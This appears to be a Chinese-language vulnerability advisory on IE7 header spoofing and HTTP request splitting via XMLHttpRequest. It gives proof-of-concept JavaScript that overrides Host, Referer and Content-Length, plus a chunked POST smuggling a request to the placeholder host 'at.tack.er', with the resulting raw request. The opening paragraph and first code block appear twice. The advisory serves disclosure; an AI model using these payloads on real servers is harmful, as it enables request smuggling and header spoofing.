Internet Explorer是微软发布的非常流行的WEB浏览器。 IE 7允许通过HTTP请求拆分攻击覆盖Content-Length、Host和Referer等HTTP头,导致HTTP头信息欺骗。 类似于以下javascript: ---------------------------------------------- var x=new XMLHttpRequest(); x.open(\"POST\",\"/\"); for(f=127;f<255;f++) try{ x.setRequestHeader(\"Host\"+String.fromCharCode(f),\"Test\"); }catch(dd){} x.setRequestHeader(\"Connection\",\"keep-alive\"); x.onreadystatechange=function (){ if (x.readyState == 4){ } } x.send(\"blah\"); ---------------------------------------------- 会覆盖以下头: - Content-Length x.setRequestHeader(\"Content-Length\"+String.fromCharCode(201),\"0\"); x.setRequestHeader(\"Content-Length\"+String.fromCharCode(233),\"0\"); x.setRequestHeader(\"Content-Length\"+String.fromCharCode(240)+String.fromCharCode(213),\"0\"); - Host x.setRequestHeader(\"Host\"+String.fromCharCode(223), \"www.microsoft.com\"); - Referer x.setRequestHeader(\"Referer\"+String.fromCharCode(205)+String.fromCharCode(155),\"http://www.referrer.tld\");...
Internet Explorer是微软发布的非常流行的WEB浏览器。 IE 7允许通过HTTP请求拆分攻击覆盖Content-Length、Host和Referer等HTTP头,导致HTTP头信息欺骗。 类似于以下javascript: ---------------------------------------------- var x=new XMLHttpRequest(); x.open(\"POST\",\"/\"); for(f=127;f<255;f++) try{ x.setRequestHeader(\"Host\"+String.fromCharCode(f),\"Test\"); }catch(dd){} x.setRequestHeader(\"Connection\",\"keep-alive\"); x.onreadystatechange=function (){ if (x.readyState == 4){ } } x.send(\"blah\"); ---------------------------------------------- 会覆盖以下头: - Content-Length x.setRequestHeader(\"Content-Length\"+String.fromCharCode(201),\"0\"); x.setRequestHeader(\"Content-Length\"+String.fromCharCode(233),\"0\"); x.setRequestHeader(\"Content-Length\"+String.fromCharCode(240)+String.fromCharCode(213),\"0\"); - Host x.setRequestHeader(\"Host\"+String.fromCharCode(223), \"www.microsoft.com\"); - Referer x.setRequestHeader(\"Referer\"+String.fromCharCode(205)+String.fromCharCode(155),\"http://www.referrer.tld\"); x.setRequestHeader(\"Referer\"+String.fromCharCode(237)+String.fromCharCode(155),\"http://www.referrer.tld\"); Internet Explorer 7允许在setRequestHeader中设置Transfer Encoding: chunked头,导致Http请求拆分/渗透漏洞。 假设存在反射跨站脚本漏洞影响的站点与攻击者的站点托管在同一台主机上,且用户没有配置代理,由于IE7允许设置 setRequestHeader(\"Transfer-Encoding\",\"chunked\"); 因此就允许将POST请求中的负载用作Web服务器的其他请求。例如: ----------------------------------------------------- var x=new XMLHttpRequest(); for(var i =0; i<1;i++){ x.open(\"POST\",\"/\"); x.setRequestHeader(\"Transfer-Encoding\",\"chunked\"); x.setRequestHeader(\"Proxy-Connection\",\"keep-alive\"); x.setRequestHeader(\"Connection\",\"keep-alive\"); x.onreadystatechange=function (){ if (x.readyState == 4){ } } try{ x.send(\"0\r\n\r\nPOST / HTTP/1.1\r\nHost: at.tack.er\r\nContent-Length: SOMELENGTH\r\n\r\n\") }catch(r){} } ----------------------------------------------------- 请求会变为: ---------------------------------------------------- POST / HTTP/1.1 Accept: */* Accept-Language: it Transfer-Encoding: chunked Connection: keep-alive Cache-Control: no-cache Referer: http://vi.ct.im/ UA-CPU: x86 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322) Host: at.tack.er Content-Length: 67 0 POST /?Send1 HTTP/1.1 Host: at.tack.er Content-Length: TheLenghtOfTheNextRequest ---------------------------------------------------- 这样Web服务器就会打开套接字等待负载。